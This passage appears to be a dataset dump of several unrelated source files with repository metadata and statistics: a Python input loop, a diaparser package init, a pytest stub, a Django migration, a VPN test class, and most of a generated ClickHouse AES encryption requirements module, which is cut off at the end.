| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
c6035c7f834a672ec65d149077f4469c3bf0dd9b
| 253
|
py
|
Python
|
Python_RPA/Python_RPA_03.py
|
Leeyua-airim/shiny_repo
|
6b3e3021c1bdd85452ed16723a6cb4d98be41f0d
|
[
"MIT"
] | 10
|
2019-07-31T13:06:34.000Z
|
2019-09-05T05:39:49.000Z
|
Python_RPA/Python_RPA_03.py
|
Leeyua-airim/shiny_repo
|
6b3e3021c1bdd85452ed16723a6cb4d98be41f0d
|
[
"MIT"
] | 1
|
2021-04-24T13:18:12.000Z
|
2021-04-24T13:18:12.000Z
|
Python_RPA/Python_RPA_03.py
|
Leeyua-airim/R_AIRIM
|
6b3e3021c1bdd85452ed16723a6cb4d98be41f0d
|
[
"MIT"
] | 11
|
2020-01-01T06:38:37.000Z
|
2021-08-13T13:59:23.000Z
|
"""
user_input = ''
while user_input != 'quit':
user_input = input('Input: ')
print(user_input)
"""
user_input = ''
while user_input != 'quit':
user_input = input('Input: ')
print(user_input)
if user_input == 'exit':
break
| 16.866667
| 33
| 0.588933
| 31
| 253
| 4.516129
| 0.258065
| 0.578571
| 0.2
| 0.257143
| 0.857143
| 0.857143
| 0.857143
| 0.857143
| 0.857143
| 0.857143
| 0
| 0
| 0.241107
| 253
| 14
| 34
| 18.071429
| 0.729167
| 0.391304
| 0
| 0
| 0
| 0
| 0.10274
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d6869031cc7be916778fc2f947e542bf428a2626
| 140
|
py
|
Python
|
diaparser/catalog/__init__.py
|
zoonru/diaparser
|
afae32ca91b84b64c163c749599dfa264e647773
|
[
"MIT"
] | 38
|
2020-10-21T17:43:19.000Z
|
2022-03-01T15:15:25.000Z
|
diaparser/catalog/__init__.py
|
zoonru/diaparser
|
afae32ca91b84b64c163c749599dfa264e647773
|
[
"MIT"
] | 11
|
2020-11-01T14:55:38.000Z
|
2022-02-03T19:51:06.000Z
|
diaparser/catalog/__init__.py
|
zoonru/diaparser
|
afae32ca91b84b64c163c749599dfa264e647773
|
[
"MIT"
] | 7
|
2020-12-18T10:46:51.000Z
|
2022-01-11T22:03:11.000Z
|
from .catalog import select, available_processors, download_processors
__all__ = ['select', 'available_processors', 'download_processors']
| 35
| 70
| 0.814286
| 14
| 140
| 7.571429
| 0.571429
| 0.283019
| 0.471698
| 0.622642
| 0.811321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 140
| 3
| 71
| 46.666667
| 0.828125
| 0
| 0
| 0
| 0
| 0
| 0.321429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d6d763260980d777ad0a1534dc78854e6736cc9e
| 146
|
py
|
Python
|
python/tests/test_fifo_animal_shelter.py
|
kylehoac/data-structures-and-algorithms
|
52326ffcf27b5cc27863a96db86ece585f3d5e33
|
[
"MIT"
] | null | null | null |
python/tests/test_fifo_animal_shelter.py
|
kylehoac/data-structures-and-algorithms
|
52326ffcf27b5cc27863a96db86ece585f3d5e33
|
[
"MIT"
] | 7
|
2021-04-15T23:51:52.000Z
|
2021-04-26T17:18:16.000Z
|
python/tests/test_fifo_animal_shelter.py
|
kylehoac/data-structures-and-algorithms
|
52326ffcf27b5cc27863a96db86ece585f3d5e33
|
[
"MIT"
] | null | null | null |
import pytest
from code_challenges.fifo_animal_shelter.fifo_animal_shelter import AnimalShelter
def test_is_queue():
assert AnimalShelter()
| 20.857143
| 81
| 0.842466
| 19
| 146
| 6.105263
| 0.736842
| 0.172414
| 0.293103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 146
| 6
| 82
| 24.333333
| 0.892308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ba4193d5f62bedc295e892454d0457191eb5738d
| 2,792
|
py
|
Python
|
mat_db/main/migrations/0045_alter_fibreorientation_e_alter_fibreorientation_re_and_more.py
|
tkminek/material_database
|
8661617077192d20e8d9445cd6560bf1266f0582
|
[
"MIT"
] | null | null | null |
mat_db/main/migrations/0045_alter_fibreorientation_e_alter_fibreorientation_re_and_more.py
|
tkminek/material_database
|
8661617077192d20e8d9445cd6560bf1266f0582
|
[
"MIT"
] | null | null | null |
mat_db/main/migrations/0045_alter_fibreorientation_e_alter_fibreorientation_re_and_more.py
|
tkminek/material_database
|
8661617077192d20e8d9445cd6560bf1266f0582
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.2 on 2022-03-11 12:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0044_alter_hosedynamic_dyn_e_min40_and_more'),
]
operations = [
migrations.AlterField(
model_name='fibreorientation',
name='E',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='Re',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='Rm',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='Ru',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='comment',
field=models.CharField(blank=True, max_length=1000),
),
migrations.AlterField(
model_name='fibreorientation',
name='nu',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibreorientation',
name='rho',
field=models.FloatField(),
),
migrations.AlterField(
model_name='fibresncurve',
name='Nf',
field=models.CharField(max_length=20000),
),
migrations.AlterField(
model_name='fibresncurve',
name='Sa',
field=models.CharField(max_length=20000),
),
migrations.AlterField(
model_name='fibrestaticcurve',
name='K',
field=models.FloatField(max_length=200),
),
migrations.AlterField(
model_name='fibrestaticcurve',
name='n',
field=models.FloatField(max_length=200),
),
migrations.AlterField(
model_name='rubbertemp',
name='E',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='Re',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='Rm',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='Ru',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='nu',
field=models.FloatField(),
),
migrations.AlterField(
model_name='rubbertemp',
name='rho',
field=models.FloatField(),
),
]
| 28.20202
| 64
| 0.517908
| 220
| 2,792
| 6.440909
| 0.259091
| 0.239944
| 0.299929
| 0.347918
| 0.846154
| 0.8271
| 0.705716
| 0.67043
| 0.67043
| 0.176429
| 0
| 0.02319
| 0.366762
| 2,792
| 98
| 65
| 28.489796
| 0.778281
| 0.016117
| 0
| 0.858696
| 1
| 0
| 0.113661
| 0.015665
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.01087
| 0
| 0.043478
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba80ab7453db29bf1186939d5d99cb658f19828b
| 163
|
py
|
Python
|
xv_leak_tools/test_components/vpn_application/android/android_vpn_application.py
|
UAEKondaya1/expressvpn_leak_testing
|
9e4cee899ac04f7820ac351fa55efdc0c01370ba
|
[
"MIT"
] | 219
|
2017-12-12T09:42:46.000Z
|
2022-03-13T08:25:13.000Z
|
xv_leak_tools/test_components/vpn_application/android/android_vpn_application.py
|
UAEKondaya1/expressvpn_leak_testing
|
9e4cee899ac04f7820ac351fa55efdc0c01370ba
|
[
"MIT"
] | 11
|
2017-12-14T08:14:51.000Z
|
2021-08-09T18:37:45.000Z
|
xv_leak_tools/test_components/vpn_application/android/android_vpn_application.py
|
UAEKondaya1/expressvpn_leak_testing
|
9e4cee899ac04f7820ac351fa55efdc0c01370ba
|
[
"MIT"
] | 45
|
2017-12-14T07:26:36.000Z
|
2022-03-11T09:36:56.000Z
|
from xv_leak_tools.test_components.vpn_application.mobile_vpn_application import MobileVPNApplication
class AndroidVPNApplication(MobileVPNApplication):
pass
| 32.6
| 101
| 0.889571
| 17
| 163
| 8.176471
| 0.823529
| 0.201439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07362
| 163
| 4
| 102
| 40.75
| 0.92053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
bae8b5cc3c116e7f189a9434f34eaee16d539030
| 138,997
|
py
|
Python
|
tests/testflows/aes_encryption/requirements/requirements.py
|
jorisgio/ClickHouse
|
9ec78855cded9eb5a84e7fed300ff7f8a4b497c2
|
[
"Apache-2.0"
] | 1
|
2020-11-16T03:55:59.000Z
|
2020-11-16T03:55:59.000Z
|
tests/testflows/aes_encryption/requirements/requirements.py
|
jorisgio/ClickHouse
|
9ec78855cded9eb5a84e7fed300ff7f8a4b497c2
|
[
"Apache-2.0"
] | null | null | null |
tests/testflows/aes_encryption/requirements/requirements.py
|
jorisgio/ClickHouse
|
9ec78855cded9eb5a84e7fed300ff7f8a4b497c2
|
[
"Apache-2.0"
] | null | null | null |
# These requirements were auto generated
# from software requirements specification (SRS)
# document by TestFlows v1.6.200731.1222107.
# Do not edit by hand but re-generate instead
# using 'tfs requirements generate' command.
from testflows.core import Requirement
RQ_SRS008_AES_Functions = Requirement(
name='RQ.SRS008.AES.Functions',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support [AES] encryption functions to encrypt and decrypt data.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_MySQL = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.MySQL',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support [AES] encryption functions compatible with [MySQL 5.7].\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_Dictionaries = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.Dictionaries',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support encryption and decryption of data accessed on remote\n'
'[MySQL] servers using [MySQL Dictionary].\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_Engine_Database_MySQL = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.Engine.Database.MySQL',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support encryption and decryption of data accessed using [MySQL Database Engine],\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_Engine_Table_MySQL = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.Engine.Table.MySQL',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support encryption and decryption of data accessed using [MySQL Table Engine].\n'
),
link=None
)
RQ_SRS008_AES_Functions_Compatability_TableFunction_MySQL = Requirement(
name='RQ.SRS008.AES.Functions.Compatability.TableFunction.MySQL',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support encryption and decryption of data accessed using [MySQL Table Function].\n'
),
link=None
)
RQ_SRS008_AES_Functions_DifferentModes = Requirement(
name='RQ.SRS008.AES.Functions.DifferentModes',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL allow different modes to be supported in a single SQL statement\n'
'using explicit function parameters.\n'
),
link=None
)
RQ_SRS008_AES_Functions_DataFromMultipleSources = Requirement(
name='RQ.SRS008.AES.Functions.DataFromMultipleSources',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support handling encryption and decryption of data from multiple sources\n'
'in the `SELECT` statement, including [ClickHouse] [MergeTree] table as well as [MySQL Dictionary],\n'
'[MySQL Database Engine], [MySQL Table Engine], and [MySQL Table Function]\n'
'with possibly different encryption schemes.\n'
),
link=None
)
RQ_SRS008_AES_Functions_SuppressOutputOfSensitiveValues = Requirement(
name='RQ.SRS008.AES.Functions.SuppressOutputOfSensitiveValues',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL suppress output of [AES] `string` and `key` parameters to the system log,\n'
'error log, and `query_log` table to prevent leakage of sensitive values.\n'
),
link=None
)
RQ_SRS008_AES_Functions_InvalidParameters = Requirement(
name='RQ.SRS008.AES.Functions.InvalidParameters',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when parameters are invalid.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Mismatched_Key = Requirement(
name='RQ.SRS008.AES.Functions.Mismatched.Key',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return garbage for mismatched keys.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Mismatched_IV = Requirement(
name='RQ.SRS008.AES.Functions.Mismatched.IV',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return garbage for mismatched initialization vector for the modes that use it.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Mismatched_AAD = Requirement(
name='RQ.SRS008.AES.Functions.Mismatched.AAD',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return garbage for mismatched additional authentication data for the modes that use it.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Mismatched_Mode = Requirement(
name='RQ.SRS008.AES.Functions.Mismatched.Mode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error or garbage for mismatched mode.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Check_Performance = Requirement(
name='RQ.SRS008.AES.Functions.Check.Performance',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Performance of [AES] encryption functions SHALL be measured.\n'
),
link=None
)
RQ_SRS008_AES_Function_Check_Performance_BestCase = Requirement(
name='RQ.SRS008.AES.Function.Check.Performance.BestCase',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Performance of [AES] encryption functions SHALL be checked for the best case\n'
'scenario where there is one key, one initialization vector, and one large stream of data.\n'
),
link=None
)
RQ_SRS008_AES_Function_Check_Performance_WorstCase = Requirement(
name='RQ.SRS008.AES.Function.Check.Performance.WorstCase',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Performance of [AES] encryption functions SHALL be checked for the worst case\n'
'where there are `N` keys, `N` initialization vectors and `N` very small streams of data.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Check_Compression = Requirement(
name='RQ.SRS008.AES.Functions.Check.Compression',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Effect of [AES] encryption on column compression SHALL be measured.\n'
),
link=None
)
RQ_SRS008_AES_Functions_Check_Compression_LowCardinality = Requirement(
name='RQ.SRS008.AES.Functions.Check.Compression.LowCardinality',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'Effect of [AES] encryption on the compression of a column with [LowCardinality] data type\n'
'SHALL be measured.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function = Requirement(
name='RQ.SRS008.AES.Encrypt.Function',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes_encrypt` function to encrypt data using [AES].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Syntax = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Syntax',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support the following syntax for the `aes_encrypt` function\n'
'\n'
'```sql\n'
'aes_encrypt(plaintext, key, mode, [iv, aad])\n'
'```\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_NIST_TestVectors = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.NIST.TestVectors',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] `aes_encrypt` function output SHALL produce output that matches [NIST test vectors].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_PlainText = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.PlainText',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `plaintext` accepting any data type as\n'
'the first parameter to the `aes_encrypt` function that SHALL specify the data to be encrypted.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Key = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Key',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `key` with `String` or `FixedString` data types\n'
'as the second parameter to the `aes_encrypt` function that SHALL specify the encryption key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `mode` with `String` or `FixedString` data types as the third parameter\n'
'to the `aes_encrypt` function that SHALL specify encryption key length and block encryption mode.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_ValuesFormat = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.ValuesFormat',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support values of the form `aes-[key length]-[mode]` for the `mode` parameter\n'
'of the `aes_encrypt` function where\n'
'the `key_length` SHALL specifies the length of the key and SHALL accept\n'
'`128`, `192`, or `256` as the values and the `mode` SHALL specify the block encryption\n'
'mode and SHALL accept [ECB], [CBC], [CFB1], [CFB8], [CFB128], or [OFB] as well as\n'
'[CTR] and [GCM] as the values. For example, `aes-256-ofb`.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_Invalid = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.Invalid',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the specified value for the `mode` parameter of the `aes_encrypt`\n'
'function is not valid with the exception where such a mode is supported by the underlying\n'
'[OpenSSL] implementation.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_ECB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ecb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_ECB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ecb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_ECB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ecb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CBC = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cbc` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CBC = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cbc` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CBC = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cbc` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CFB1 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb1` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CFB1 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb1` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CFB1 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb1` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CFB8 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb8` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CFB8 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb8` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CFB8 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb8` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CFB128 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb128` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_CFB128 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb128` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_CFB128 = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb128` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_OFB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ofb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_OFB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ofb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_OFB = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ofb` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_GCM = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-128-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-gcm` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 128 bit key.\n'
'An `AEAD` 16-byte tag is appended to the resulting ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_192_GCM = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-192-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-gcm` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 192 bit key.\n'
'An `AEAD` 16-byte tag is appended to the resulting ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_256_GCM = Requirement(
name='RQ.SRS008.AES.Encrypt.Function.Parameters.Mode.Value.AES-256-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-gcm` as the value for the `mode` parameter of the `aes_encrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 256 bit key.\n'
'An `AEAD` 16-byte tag is appended to the resulting ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Encrypt_Function_Parameters_Mode_Value_AES_128_CTR = Requirement(
